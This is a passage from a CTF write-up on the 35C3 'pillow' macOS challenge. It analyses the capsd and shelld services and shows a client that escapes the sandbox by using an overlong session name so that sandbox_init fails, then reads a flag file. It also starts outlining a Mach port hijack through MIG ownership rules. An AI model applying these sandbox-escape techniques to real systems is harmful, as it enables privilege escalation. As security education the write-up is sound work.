    CFNumberRef key = CFNumberCreate(kCFAllocatorDefault, kCFNumberSInt32Type, &pid);
    // Reference to a CF dictionary; note that this is only a reference
    CFMutableDictionaryRef capabilities;
    /* Is this key already in capabilities_by_pid (i.e. was this pid added before)?
       If so, store a reference to its value (itself a dictionary) in capabilities */
    if (!CFDictionaryGetValueIfPresent(capabilities_by_pid, key, (const void**)&capabilities)) {
        // The pid is not in the global dictionary yet, so create a value for it
        capabilities = CFDictionaryCreateMutable(kCFAllocatorDefault, 0, &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);
        // and store the key/value pair in the global dictionary
        CFDictionaryAddValue(capabilities_by_pid, key, capabilities);
        CFRelease(capabilities);
        // Register a handler that removes the stored entry automatically when that process exits
        dispatch_source_t source = dispatch_source_create(DISPATCH_SOURCE_TYPE_PROC, pid, DISPATCH_PROC_EXIT, dispatch_get_main_queue());
        dispatch_source_set_event_handler(source, ^{
            os_log(OS_LOG_DEFAULT, "cleaning up capabilities for dead client %d", pid);

            CFDictionaryRemoveValue(capabilities_by_pid, key);

            CFRelease(key);

            dispatch_source_cancel(source);
            dispatch_release(source);
        });
        dispatch_resume(source);
    } else {
        // Already present: nothing to do, the capabilities dictionary for this pid is returned to the caller
        CFRelease(key);
    }
    // Either way, the value dictionary stored in the global dictionary for this key is returned
    return capabilities;
}

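The function first checks whether the process with the given pid is still alive. If the target process is already dead, there is no point in creating a capability dictionary for it.

Sending signal 0 to a process delivers no signal at all, but error checking is still performed.
ESRCH is the error code for a nonexistent process: if the given pid does not exist, kill with signal 0 fails and sets errno to ESRCH.

If the process is alive, the function checks whether the global dictionary already has an entry for that pid. If it does, the reference to its value is returned to the caller; otherwise a new (pid, capabilities) pair is created and inserted into the global dictionary, and the reference to the new value is returned.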
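
The same liveness probe can be tried from Python on a POSIX system. This is just an illustration of the signal 0 idiom; the helper name process_exists is hypothetical and not part of the challenge code.

```python
import errno
import os

def process_exists(pid):
    """Mirror the C check `kill(pid, 0) != 0 && errno == ESRCH`."""
    try:
        os.kill(pid, 0)  # signal 0: existence and permission checks only
    except OSError as exc:
        if exc.errno == errno.ESRCH:
            return False  # no such process
        # Any other error (for example EPERM) means the process exists
        # but we are not allowed to signal it.
    return True

alive = process_exists(os.getpid())
```

As the comment in the C code admits, the check is racy: the process may exit right after the probe succeeds.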

4) grant_capability_internal function

grant_capability_internal is arguably the core function of capsd, yet its code is also short:

kern_return_t grant_capability_internal(audit_token_t token, pid_t target, const char* op, const char* arg) {
    // Ask the sandbox whether the process identified by token is allowed to perform op on arg
    if (sandbox_check_by_audit_token(token, op, SANDBOX_CHECK_NO_REPORT, arg, NULL, NULL, NULL) == 0) {
        // Allowed: get or create the capabilities dictionary for the given pid
        CFMutableDictionaryRef capabilities = get_or_create_capabilities_for_pid(target);
        if (!capabilities)
            return KERN_FAILURE;
        // Convert op and arg to CFStringRef
        CFStringRef operation = CFStringCreateWithCString(kCFAllocatorDefault, op, kCFStringEncodingASCII);
        CFStringRef argument = CFStringCreateWithCString(kCFAllocatorDefault, arg, kCFStringEncodingASCII);
        // Look up the set of arguments stored under the operation key in capabilities
        CFMutableSetRef arguments;
        if (!CFDictionaryGetValueIfPresent(capabilities, operation, (const void**)&arguments)) {
            // None yet: create a new arguments set and insert it into capabilities
            arguments = CFSetCreateMutable(kCFAllocatorDefault, 0, &kCFTypeSetCallBacks);
            CFDictionaryAddValue(capabilities, operation, arguments);
            CFRelease(arguments);
        }
        // Add the new argument to the set stored under the operation key
        CFSetSetValue(arguments, argument);

        CFRelease(operation);
        CFRelease(argument);
        return KERN_SUCCESS;
    } else {
        return KERN_FAILURE;
    }
}

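At this point we can lay out all the data structures involved:

Structure of the XPC message received by the server

{
    "action" : ACTION_GRANT_CAPABILITY / ACTION_HAS_CAPABILITY,
    "pid" : target pid (int64),
    "operation" : "str type operation",
    "argument" : "str type argument"
}

Structure of the reply returned by the server

{
    "success" : 0/1
}

Structure of the global dictionary capabilities_by_pid: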

{
    pid_1 : {
        operation_1 : [
            argument_1,
            argument_2,
            ...
        ],
        operation_2 : [
            argument_1,
            argument_2,
            ...
        ],
        ...
    },
    pid_2 : {
        operation_1 : [
            argument_1,
            argument_2,
            ...
        ],
        operation_2 : [
            argument_1,
            argument_2,
            ...
        ],
        ...
    },
    ...
}
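
As a rough model, the global dictionary behaves like a dict of dicts of sets. The sketch below is not the challenge code: the source of has_capability_internal is not shown here, so the lookup follows the behaviour described in this post, and the helper names are hypothetical.

```python
capabilities_by_pid = {}  # pid -> {operation -> set of arguments}

def record_capability(pid, operation, argument):
    """Store one (operation, argument) pair under the given pid."""
    capabilities_by_pid.setdefault(pid, {}).setdefault(operation, set()).add(argument)

def has_capability(pid, operation, argument):
    """A pure lookup: no sandbox check happens at query time."""
    return argument in capabilities_by_pid.get(pid, {}).get(operation, set())

record_capability(1234, "process-exec*", "/bin/bash")
found = has_capability(1234, "process-exec*", "/bin/bash")
missing = has_capability(1234, "file-read-data", "/etc/passwd")
```

The query side trusts whatever was recorded earlier, so everything hinges on how entries get into the dictionary.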

That is not the main point, though. Notice that token, the first argument of sandbox_check_by_audit_token, is passed in through grant_capability_internal:

kern_return_t grant_capability_internal(audit_token_t token, pid_t target, const char* op, const char* arg) {
    if (sandbox_check_by_audit_token(token, op, SANDBOX_CHECK_NO_REPORT, arg, NULL, NULL, NULL) == 0) {
        ...
    }
    ...
}

And the first argument of grant_capability_internal is tied directly to the sender of the message:

audit_token_t creds;
// TODO check xpc_dictionary_set_audit_token
xpc_dictionary_get_audit_token(msg, &creds);
...

if (...) {
    xpc_dictionary_set_bool(reply, "success", grant_capability_internal(creds, ...) == KERN_SUCCESS);
} 
...

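So the pid passed to grant_capability_internal only serves as a key; what is actually checked against the sandbox is the audit token. Normally the pid of the message sender should equal the pid in the request (i.e. a sender is expected to send its own PID to the service), but nothing in the code shown above enforces this.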
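
The decoupling can be made concrete with a small model. This is a hypothetical sketch, not capsd itself: sender_allowed stands in for sandbox_check_by_audit_token, and the pids and policy are made up for the illustration.

```python
def grant_capability(store, sender_allowed, sender, target, operation, argument):
    """store: pid -> {operation -> set of arguments}.

    sender_allowed is a hypothetical stand-in for sandbox_check_by_audit_token.
    """
    if not sender_allowed(sender, operation, argument):
        return False
    # The policy check used `sender`, but the record is keyed by `target`.
    store.setdefault(target, {}).setdefault(operation, set()).add(argument)
    return True

def unsandboxed_only(sender, operation, argument):
    # Assumed policy: pid 100 is unsandboxed, every other sender is denied.
    return sender == 100

store = {}
granted = grant_capability(store, unsandboxed_only, 100, 200, "process-exec*", "/bin/bash")
denied = grant_capability(store, unsandboxed_only, 200, 200, "process-exec*", "/bin/bash")
```

In this model pid 200 ends up holding a capability it could not have obtained for itself, purely because pid 100 named it as the target.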

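Finally, a few words on sandbox_check_by_audit_token, for which almost no documentation is available:

Purpose: checks whether an operation is allowed within the sandbox; returns 0 (DECISION_ALLOW) if it is.

Declaration:

extern int SANDBOX_CHECK_NO_REPORT;
int sandbox_check_by_audit_token(audit_token_t token, const char* operation, int flags, ...);

Parameters:
- flags is usually SANDBOX_CHECK_NO_REPORT, which checks the sandbox permission silently without logging anything
- operation points to a sandbox operation string (the rule language is Scheme-like, so knowing Scheme syntax helps). More example rules can be found in OSX Sandbox Rule Set.
- The varargs after flags depend on operation, for example: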

// mach-lookup com.apple....
int port_denied = sandbox_check(pid, "mach-lookup", SANDBOX_CHECK_NO_REPORT, "com.apple....");
  
// file-read-data path/to/file
int read_denied = sandbox_check(pid, "file-read-data", SANDBOX_CHECK_NO_REPORT, "path/to/file");

c. client.c

The client is very simple, so it needs no further explanation:

int main(int argc, const char *argv[]) {
    // Open an XPC connection to capsd
    xpc_connection_t connection = xpc_connection_create_mach_service("net.saelo.capsd.xpc", NULL, 0);
    xpc_connection_set_event_handler(connection, ^(xpc_object_t event) {
    });
    xpc_connection_resume(connection);

    pid_t pid;
    puts("Enter pid:");
    scanf("%d", &pid);

    printf("Adding capability 'process-exec*' for resource '/bin/bash' to process %d\n", pid);
    // Build the XPC message dictionary
    xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);
    xpc_dictionary_set_uint64(msg, "action", ACTION_GRANT_CAPABILITY);
    xpc_dictionary_set_int64(msg, "pid", pid);
    xpc_dictionary_set_string(msg, "operation", "process-exec*");
    xpc_dictionary_set_string(msg, "argument", "/bin/bash");
    // Send the message and wait for the server's reply
    xpc_object_t reply = xpc_connection_send_message_with_reply_sync(connection, msg);
    // Print the reply
    char* description = xpc_copy_description(reply);
    printf("Reply: %s\n", description);

    return 0;
}

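Result:

d. Functionality

Putting the code above together, capsd exposes the same two interfaces, grant_capability and has_capability, over both mach IPC and XPC.

grant_capability checks whether the sandbox allows the message sender to perform the requested operation, and if so records it in the global dictionary.

"Grant" here only means adding the requested op and arg to the global dictionary; no new permission is actually assigned.

When a later request asks whether some pid holds a particular sandbox capability (has_capability), capsd merely checks whether that op and arg were previously saved in the global dictionary and answers accordingly.

Next, let's look at shelld.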

2. shelld

a. shelld.defs

Four routines are defined here: shelld_create_session, shell_exec, register_completion_listener and unregister_completion_listener. Their usage is covered later, since the defs alone do not reveal much.

subsystem shelld 133700;

#include 
#include 
#include 

import "../common/types.h";

type string = c_string[*:4096];

routine shelld_create_session(server: mach_port_t; name: string; ServerAuditToken token: audit_token_t);
routine shell_exec(server: mach_port_t; session: string; command: string; ServerAuditToken token: audit_token_t);
routine register_completion_listener(server: mach_port_t; session: string; listener: mach_port_t; ServerAuditToken token: audit_token_t);
routine unregister_completion_listener(server: mach_port_t; session: string; ServerAuditToken token: audit_token_t);

b. shelld_client.defs

This defines the shelld_client_notify routine, presumably used by the server to notify the client.

subsystem shelld_client 133800;

#include 
#include 
#include 

import "../common/types.h";

type string = c_string[*:4096];

routine shelld_client_notify(listener: mach_port_t; status: int; output: string);

c. shelld.c

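1) The shelld main function

main does the following:

Creates a global dictionary, sessions.
Creates the directory /private/tmp/shelld with mode rwxrwxrwx.
Looks up the Mach port registered by capsd in bootstrap, and checks its own Mach port in with bootstrap.
Installs the MIG handler routine on its own Mach port.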

int main(int argc, const char *argv[]) {
    kern_return_t kr;
    mach_port_t bootstrap_port, service_port;

    sessions = CFDictionaryCreateMutable(kCFAllocatorDefault, 0, &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);

    mkdir("/private/tmp/shelld", 0777);

    task_get_special_port(mach_task_self(), TASK_BOOTSTRAP_PORT, &bootstrap_port);

    kr = bootstrap_look_up(bootstrap_port, "net.saelo.capsd", &capsd_service_port);
    ASSERT_KERN_SUCCESS(kr, "bootstrap_look_up");

    kr = bootstrap_check_in(bootstrap_port, "net.saelo.shelld", &service_port);
    ASSERT_KERN_SUCCESS(kr, "bootstrap_check_in");

    dispatch_source_t source = dispatch_source_create(DISPATCH_SOURCE_TYPE_MACH_RECV, service_port, 0, dispatch_get_main_queue());

    dispatch_source_set_event_handler(source, ^{
        dispatch_mig_server(source, MAX_MSG_SIZE, shelld_server);
    });

    dispatch_resume(source);
    dispatch_main();
    exit(-1);
}

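2) The register_completion_listener function

This function is simple: it looks up, in the global sessions dictionary, the session that matches both session_name and the client, and stores the listener Mach port that was passed in.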

kern_return_t register_completion_listener(mach_port_t server, const char* session_name, mach_port_t listener, audit_token_t client) {
    CFMutableDictionaryRef session = lookup_session(session_name, client);
    if (!session) {
        mach_port_deallocate(mach_task_self(), listener);
        return KERN_FAILURE;
    }

    CFNumberRef value = CFNumberCreate(kCFAllocatorDefault, kCFNumberSInt32Type, &listener);
    CFDictionaryAddValue(session, CFSTR("listener"), value);
    CFRelease(value);

    return KERN_SUCCESS;
}

CFMutableDictionaryRef lookup_session(const char* name, audit_token_t client) {
    CFStringRef key = CFStringCreateWithCString(kCFAllocatorDefault, name, kCFStringEncodingASCII);

    CFMutableDictionaryRef session = NULL;
    if (CFDictionaryGetValueIfPresent(sessions, key, (const void**)&session)) {
        CFNumberRef cf_owner_pid = CFDictionaryGetValue(session, CFSTR("pid"));
        int owner_pid;
        ASSERT(CFNumberGetValue(cf_owner_pid, kCFNumberSInt32Type, &owner_pid));
        if (owner_pid != audit_token_to_pid(client))
            session = NULL;
    }

    CFRelease(key);

    return session;
}

At this point we can tentatively describe the structure of the sessions dictionary as:

{
    "session_name1" : {
        "pid" : owner_pid,
        "listener" : listener_port_name
    },
    [...]
}

3) The unregister_completion_listener function

This is the inverse of register_completion_listener: it removes the listener Mach port from the session.

kern_return_t unregister_completion_listener(mach_port_t server, const char* session_name, audit_token_t client) {
    CFMutableDictionaryRef session = lookup_session(session_name, client);
    if (!session)
        return KERN_FAILURE;

    return remove_listener(session);
}

kern_return_t remove_listener(CFMutableDictionaryRef session) {
    CFNumberRef value;

    if (CFDictionaryGetValueIfPresent(session, CFSTR("listener"), (const void**)&value)) {
        mach_port_t listener;
        ASSERT(CFNumberGetValue(value, kCFNumberSInt32Type, &listener));
        mach_port_deallocate(mach_task_self(), listener);
        CFDictionaryRemoveValue(session, CFSTR("listener"));
        return KERN_SUCCESS;
    } else {
        return KERN_FAILURE;
    }
}

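4) The shelld_create_session function

This function mainly creates the bookkeeping entries in the global sessions dictionary. The individual steps are annotated as comments in the code: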

kern_return_t shelld_create_session(mach_port_t server, const char* session_name, audit_token_t client) {
    // The session name may contain only letters and digits
    for (const char* ptr = session_name; *ptr; ptr++) {
        if (!isalnum(*ptr)) {
            os_log(OS_LOG_DEFAULT, "shelld: denying invalid session name: %s", session_name);
            return KERN_FAILURE;
        }
    }
    // A session with the same name cannot be created twice
    CFStringRef key = CFStringCreateWithCString(kCFAllocatorDefault, session_name, kCFStringEncodingASCII);
    if (CFDictionaryContainsKey(sessions, key)) {
        os_log(OS_LOG_DEFAULT, "shelld: session already exists: %s", session_name);
        CFRelease(key);
        return KERN_FAILURE;
    }
    // Create the session dictionary and add it to the global sessions dictionary
    CFMutableDictionaryRef session = CFDictionaryCreateMutable(kCFAllocatorDefault, 0, &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);
    CFDictionaryAddValue(sessions, key, session);
    // Store the pid derived from the audit token in the session dictionary
    pid_t pid = audit_token_to_pid(client);

    CFNumberRef cf_pid = CFNumberCreate(kCFAllocatorDefault, kCFNumberSInt32Type, &pid);
    CFDictionaryAddValue(session, CFSTR("pid"), cf_pid);
    CFRelease(cf_pid);
    // Create a working directory for the new session
    char workdir[1024];
    snprintf(workdir, sizeof(workdir), "/private/tmp/shelld/%s", session_name);
    mkdir(workdir, 0777);

    // Note: this is racy: the client could exit and spawn a priviliged process into its PID before the server
    // gets here... Not too easy to exploit though from inside the sandbox so should be fine for a CTF :)
    // Register the cleanup handler that runs when the process with this pid exits
    dispatch_source_t source = dispatch_source_create(DISPATCH_SOURCE_TYPE_PROC, pid, DISPATCH_PROC_EXIT, dispatch_get_main_queue());
    dispatch_source_set_event_handler(source, ^{
        os_log(OS_LOG_DEFAULT, "shelld: cleaning up session for dead client %d", pid);

        remove_listener(session);
        CFDictionaryRemoveValue(sessions, key);

        // TODO unlink directory here as well

        CFRelease(session);
        CFRelease(key);

        dispatch_source_cancel(source);
        dispatch_release(source);
    });
    dispatch_resume(source);

    return KERN_SUCCESS;
}

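5) The shell_exec function

This function is the centerpiece and deserves a careful walkthrough.

First, shelld checks whether the command passed in is empty. The command is used by the child process created below, with the effect of system(command), so it must not be empty.

if (!command || strlen(command) == 0)
    return KERN_FAILURE;

Next, it checks whether the sender is allowed to execute /bin/bash, because the child process will run /bin/bash.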

// Check whether the supplied creds are allowed to execute /bin/bash
if (sandbox_check_with_capabilities(creds, "process-exec*", SANDBOX_CHECK_NO_REPORT, "/bin/bash")) {
    os_log(OS_LOG_DEFAULT, "shelld: denying request to sandboxed client %d\n", audit_token_to_pid(creds));
    return KERN_FAILURE;
}

sandbox_check_with_capabilities works as follows:

int sandbox_check_with_capabilities(audit_token_t creds, const char* operation, int flags, const char* arg) {
     // Ask the sandbox whether the sender may perform this operation
     int result = sandbox_check_by_audit_token(creds, operation, flags, arg);
     if (result != 1) {
         // Not denied: return the result as is (0 means the operation is allowed)
         return result;
     }
     // The sandbox denies the operation, so ask capsd whether the sender was granted this capability earlier
     int client_has_capability = 0;
     pid_t pid = audit_token_to_pid(creds);
     has_capability(capsd_service_port, pid, operation, arg, &client_has_capability);
     // If capsd reports the capability (client_has_capability != 0), return 0 to allow the operation
     return !client_has_capability;
}

After that, shelld fetches the session matching the given session name and creds, and creates a pipe. The pipe is used to redirect the child's stdout.

// Fetch the session that belongs to these creds
CFMutableDictionaryRef session = lookup_session(session_name, creds);
if (!session)
    return KERN_FAILURE;
// Create a pipe (one read end, one write end); it is used to redirect the child's stdout
int fds[2];
ASSERT(pipe(fds) == 0);

Next the child process is created. Let's see what it does:

// Create the new process
int pid = fork();
if (pid == 0) {
    // In the child process
    char* argv[] = {"/bin/bash", "-c", (char*)command, NULL};
    char* envp[] = {"PATH=/bin:/usr/bin:/usr/sbin", NULL};
    // Change the child's working directory to the session directory created earlier
    char cwd[1024];
    snprintf(cwd, sizeof(cwd), "/private/tmp/shelld/%s", session_name);
    chdir(cwd);
    // Enter the sandbox voluntarily
    char profile[4096];
    snprintf(profile, sizeof(profile), sb_profile_template, session_name);
    sandbox_init(profile, 0, NULL);
    // Redirect stdout
    dup2(fds[1], STDOUT_FILENO);
    close(STDERR_FILENO);
    close(STDIN_FILENO);

    close(fds[0]);
    close(fds[1]);
    // Execute bash
    execve("/bin/bash", argv, envp);
    _exit(-1);
} else if (pid < 0) {
    return KERN_FAILURE;
}

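As shown, the child first changes its working directory, then voluntarily enters the sandbox, redirects stdout, and finally executes bash.

sandbox_init needs a sandbox profile. Here is the profile template used for the child: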

const char* sb_profile_template =   "(version 1)\n"
                                    "(deny default)\n"
                                    "(import \"system.sb\")\n"
                                    "(allow process-fork)\n"
                                    "(allow file-read* file-write* (subpath \"/private/tmp/shelld/%s\"))\n"
                                    "(allow file-read-data file-write-data (subpath \"/dev/tty\"))\n"
                                    "(allow file-read* process-exec (subpath \"/bin/\"))\n"
                                    "(allow file-read* process-exec (subpath \"/usr/bin/\"))\n"
                                    "(allow file-read* process-exec (subpath \"/usr/sbin/\"))\n";

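The profile configures the following:

Uses a whitelist (everything is denied by default).
Imports the system rules from /System/Library/Sandbox/Profiles/system.sb, which allow common operations such as reading /dev/null and /dev/zero.
Allows fork.
Allows reading and writing everything about any file under the session's working directory.
"Everything" includes, but is not limited to, file data, file metadata, and extended attributes.
In other words, whatever can be read from a file.
Allows reading and writing data for /dev/tty and any file under it.
Allows reading and executing any file under /bin, /usr/bin, and /usr/sbin.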

Back in the parent process, the next step is to register a handler for the child's exit:

int rfd = fds[0];

__block int running = true;

// Register the cleanup handler that runs when the child exits
os_log(OS_LOG_DEFAULT, "shelld: bash spawned: %d\n", pid);
dispatch_source_t source = dispatch_source_create(DISPATCH_SOURCE_TYPE_PROC, pid, DISPATCH_PROC_EXIT, dispatch_get_main_queue());
dispatch_source_set_event_handler(source, ^{
    running = false;
    handle_process_exited(pid, session, rfd);
    dispatch_source_cancel(source);
    dispatch_release(source);
});
dispatch_resume(source);

Note the handle_process_exited function called inside the handler:

void handle_process_exited(pid_t pid, CFMutableDictionaryRef session, int output_fileno) {
    int status;
    waitpid(pid, &status, 0);

    os_log(OS_LOG_DEFAULT, "shelld: child %d exited with status %d", pid, status);

    char output[4096];
    size_t nread = read(output_fileno, output, sizeof(output) - 1);
    output[nread] = 0;

    CFNumberRef value;
    if (CFDictionaryGetValueIfPresent(session, CFSTR("listener"), (const void**)&value)) {
        mach_port_t listener;
        ASSERT(CFNumberGetValue(value, kCFNumberSInt32Type, &listener));
        shelld_client_notify(listener, status, output);
    }

    close(output_fileno);
    CFRelease(session);
}

This function reads up to 4095 bytes of the child's stdout output and sends them to the listener port, that is, to the client.

Finally, the parent registers a timeout handler: each child may run for at most 60 seconds and is killed immediately once the timeout expires.

// Set the child's timeout to 60 seconds
dispatch_after(dispatch_time(DISPATCH_TIME_NOW, 60 * NSEC_PER_SEC), dispatch_get_main_queue(), ^{
    if (!running)
        return;
    os_log(OS_LOG_DEFAULT, "shelld: killing process %d due to timeout", pid);
    kill(pid, SIGKILL);
});

d. client.c

The sample client does not do much; the explanations are inlined in the code as comments.

kern_return_t shelld_client_notify(mach_port_t listener, int status, const char* output) {
    printf("Command finished with status %d and output: %s\n", status, output);
    return KERN_SUCCESS;
}

int main() {
    printf("PID: %d\n", getpid());
    puts("Press enter to continue...");
    getchar();

    // Look up shelld's Mach port
    mach_port_t bp, sp;
    task_get_special_port(mach_task_self(), TASK_BOOTSTRAP_PORT, &bp);
    kern_return_t kr = bootstrap_look_up(bp, "net.saelo.shelld", &sp);
    ASSERT_SUCCESS(kr, "bootstrap_look_up");

    // Create a receive right (listener) and a send right to it (listener_send_right)
    mach_port_t listener, listener_send_right;
    mach_msg_type_name_t aquired_right;
    mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &listener);
    mach_port_extract_right(mach_task_self(), listener, MACH_MSG_TYPE_MAKE_SEND, &listener_send_right, &aquired_right);

    // Create a session in shelld
    if (shelld_create_session(sp, "foo") != KERN_SUCCESS) {
        puts("Failed to create session");
        exit(-1);
    }
    // Register listener_send_right as the session's listener
    register_completion_listener(sp, "foo", listener_send_right);
    mach_port_deallocate(mach_task_self(), listener_send_right);
        
    // Automatically handle the notify calls made by the server
    dispatch_source_t source = dispatch_source_create(DISPATCH_SOURCE_TYPE_MACH_RECV, listener, 0, dispatch_get_main_queue());
    dispatch_source_set_event_handler(source, ^{
        dispatch_mig_server(source, MAX_MSG_SIZE, shelld_client_server);
    });
    dispatch_activate(source);

    // Ask shelld to run a command three times in a row
    printf("%d\n", shell_exec(sp, "foo", "echo Hello World > bar"));
    printf("%d\n", shell_exec(sp, "foo", "cat bar"));
    printf("%d\n", shell_exec(sp, "foo", "cat bar"));

    dispatch_main();
    return 0;
}

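Result:

e. Functionality

From the code above we can see that shelld dynamically creates a sandboxed child process according to the sender's permissions and request. The permissions here are the capabilities stored in capsd.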

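IV. Vulnerabilities

The exploit runs inside a sandbox, so it cannot read the flag outside directly. The only way out is through the two services the challenge provides. Looking at them, shell_exec in shelld can launch a new program, so we could try to make shelld start a child process that reads the flag. Two obstacles stand in the way:

shell_exec first checks permissions (capabilities): a requester without the sandbox permission "process-exec*" for "/bin/bash" cannot make shelld start a new process. The exploit is sandboxed and its sandbox rules do not grant this permission, so it cannot pass the check directly.
Even if that check is bypassed, the child started by shell_exec still calls sandbox_init to enter a sandbox. Once the child is sandboxed, it has no permission to read the flag.

Let's start with the easier one.

1. Bypassing sandbox_init

The child started by shell_exec calls sandbox_init. If that call succeeds, the child cannot read the flag.

So how can we make sandbox_init fail? Look at the sb_profile_template string: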

const char* sb_profile_template =   "(version 1)\n"
                                    "(deny default)\n"
                                    "(import \"system.sb\")\n"
                                    "(allow process-fork)\n"
                                    "(allow file-read* file-write* (subpath \"/private/tmp/shelld/%s\"))\n"
                                    "(allow file-read-data file-write-data (subpath \"/dev/tty\"))\n"
                                    "(allow file-read* process-exec (subpath \"/bin/\"))\n"
                                    "(allow file-read* process-exec (subpath \"/usr/bin/\"))\n"
                                    "(allow file-read* process-exec (subpath \"/usr/sbin/\"))\n";

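In my tests, a string in the Scheme source of the sandbox profile cannot be longer than 1023 bytes. If it is, the profile fails to parse, sandbox_init returns immediately, and the process never enters the sandbox.

Here are the test results:

We can therefore skip the child's sandbox initialization by passing an overly long session name, as in the following client: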

#include 
#include 
#include 

#include 
#include 

boolean_t shelld_client_server(
        mach_msg_header_t *InHeadP,
        mach_msg_header_t *OutHeadP);


kern_return_t shelld_client_notify(mach_port_t listener, int status, const char* output) {
    printf("Command finished with status %d and output: %s\n", status, output);
    return KERN_SUCCESS;
}

// ./client `python -c "print('a'*3)"`
int main(int argc, char* argv[]) {
    char* session_name = argv[1];
    printf("session_name: %s\n", session_name);

    mach_port_t bp, sp;
    task_get_special_port(mach_task_self(), TASK_BOOTSTRAP_PORT, &bp);
    kern_return_t kr = bootstrap_look_up(bp, "net.saelo.shelld", &sp);
    ASSERT_SUCCESS(kr, "bootstrap_look_up");

    mach_port_t listener, listener_send_right;
    mach_msg_type_name_t aquired_right;
    mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &listener);
    mach_port_extract_right(mach_task_self(), listener, MACH_MSG_TYPE_MAKE_SEND, &listener_send_right, &aquired_right);

    shelld_create_session(sp, session_name);

    register_completion_listener(sp, session_name, listener_send_right);
    mach_port_deallocate(mach_task_self(), listener_send_right);

    dispatch_source_t source = dispatch_source_create(DISPATCH_SOURCE_TYPE_MACH_RECV, listener, 0, dispatch_get_main_queue());
    dispatch_source_set_event_handler(source, ^{
        dispatch_mig_server(source, MAX_MSG_SIZE, shelld_client_server);
    });
    dispatch_activate(source);

    // Test basic functionality
    printf("%d\n", shell_exec(sp, session_name, "echo 'Hello World'"));
    // Try to read data outside the sandbox
    printf("%d\n", shell_exec(sp, session_name, "cat /Users/kiprey/Desktop/CTF/35c3ctf/pillow/flag"));

    dispatch_main();
    return 0;
}

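The result is as follows:

As shown, when the session name is extremely long, the sandbox call is bypassed and the file outside the sandbox can be read.

This problem is solved.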
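How long the session name has to be can be estimated with a short portable sketch. It assumes that the 1023-byte limit measured above applies to the quoted path literal "/private/tmp/shelld/%s" in the profile; that reading, the `limit` parameter, and the helper names session_path_length and min_name_length are assumptions for illustration, not something confirmed by the sandbox documentation.

```c
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Path literal from sb_profile_template; %s is the session name. */
#define SESSION_PATH_FORMAT "/private/tmp/shelld/%s"

/* Length in bytes of the path literal for a session name of name_len characters. */
size_t session_path_length(size_t name_len) {
    char *name = malloc(name_len + 1);
    assert(name != NULL);
    memset(name, 'a', name_len);       /* names must be alphanumeric anyway */
    name[name_len] = '\0';
    /* snprintf with a NULL buffer only reports the length it would write */
    int n = snprintf(NULL, 0, SESSION_PATH_FORMAT, name);
    free(name);
    assert(n >= 0);
    return (size_t)n;
}

/* Smallest session-name length that pushes the literal past `limit` bytes. */
size_t min_name_length(size_t limit) {
    size_t prefix = session_path_length(0);
    return prefix > limit ? 0 : limit - prefix + 1;
}
```

Under that assumption, any name of at least min_name_length(1023) characters is enough. MIG caps the session string at 4096 bytes, and shelld formats the profile into a 4096-byte buffer, so a name near the maximum additionally truncates the profile text.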

2. Bypassing the capabilities check

This is the core of the challenge and is somewhat more involved.

a. The idea

Next we need to bypass the sandbox_check_with_capabilities check. Here is its code again:

int sandbox_check_with_capabilities(audit_token_t creds, const char* operation, int flags, const char* arg) {
    int result = sandbox_check_by_audit_token(creds, operation, flags, arg);
    if (result != 1) {
        return result;
    }

    int client_has_capability = 0;
    pid_t pid = audit_token_to_pid(creds);
    has_capability(capsd_service_port, pid, operation, arg, &client_has_capability);

    return !client_has_capability;
}

Clearly, as a sandboxed sender, the exploit is not allowed to execute /bin/bash, so sandbox_check_by_audit_token always returns 1. shelld therefore makes a second query, this time to capsd.

If capsd returned a "has capability" result to shelld, the exploit would pass the sandbox check and get the flag. Normally, though, the exploit cannot pass the sandbox_check_* call inside capsd's grant_capability, so capsd will never return the result we want.

But if we can hijack capsd_service_port and act as a fake "capsd" that sends forged results to shelld, we pass shelld's sandbox check and get the flag.
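The dependency on whoever answers the capsd query can be made explicit with a small portable model. The function below mirrors only the control flow of sandbox_check_with_capabilities; the function-pointer parameter and the names capability_oracle_t, honest_capsd, and forged_capsd are hypothetical stand-ins for the has_capability MIG call.

```c
#include <assert.h>
#include <stddef.h>

/* Answers "does pid hold this capability?"; stands in for the has_capability call. */
typedef int (*capability_oracle_t)(int pid, const char *op, const char *arg);

/* Same decision structure as sandbox_check_with_capabilities:
 * 0 means "allowed", nonzero means "denied". */
int check_with_capabilities(int sandbox_result, capability_oracle_t oracle,
                            int pid, const char *op, const char *arg) {
    assert(oracle != NULL);
    if (sandbox_result != 1)
        return sandbox_result;       /* sandbox did not deny: pass its result through */
    return !oracle(pid, op, arg);    /* sandbox denied: the oracle's answer decides */
}

/* The real capsd never recorded a grant for the sandboxed exploit. */
int honest_capsd(int pid, const char *op, const char *arg) {
    (void)pid; (void)op; (void)arg;
    return 0;
}

/* A fake capsd simply claims the capability exists. */
int forged_capsd(int pid, const char *op, const char *arg) {
    (void)pid; (void)op; (void)arg;
    return 1;
}
```

With sandbox_result fixed at 1, the outcome is entirely determined by the oracle, which is why taking over the port that shelld uses to reach capsd is sufficient.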

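So how do we forge it? This is where the MIG ownership rule comes in.

b. The MIG ownership rule

Ownership here refers to ownership of the Mach ports that a caller passes to a MIG routine as arguments.

When we studied Mach IPC earlier, we only looked at MIG examples that pass basic types and did not think about the details of passing complex types.

Thinking about it now: when a caller passes a Mach port to a server, how should the lifetime of that port be managed?

We use register_completion_listener in shelld as the example, because it is the only function that receives a Mach port as an argument.

1) shelld_server

At startup, shelld designates shelld_server to handle all incoming Mach messages. The MIG-generated shelld_server is quite simple: it does some basic checks and then uses the msgh_id field of the received Mach message to choose which routine to call:

As mentioned before, every Mach message header has a msgh_id field that is free for the user; MIG uses it to tell which server interface the client wants to call.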

// shelldServer.c
mig_external boolean_t shelld_server
    (mach_msg_header_t *InHeadP, mach_msg_header_t *OutHeadP)
{
    register mig_routine_t routine;
    // Initialize the fields of the Mach message that will be returned to the client
    OutHeadP->msgh_bits = MACH_MSGH_BITS(MACH_MSGH_BITS_REPLY(InHeadP->msgh_bits), 0);
    OutHeadP->msgh_remote_port = InHeadP->msgh_reply_port;
    /* Minimal size: routine() will update it if different */
    OutHeadP->msgh_size = (mach_msg_size_t)sizeof(mig_reply_error_t);
    OutHeadP->msgh_local_port = MACH_PORT_NULL;
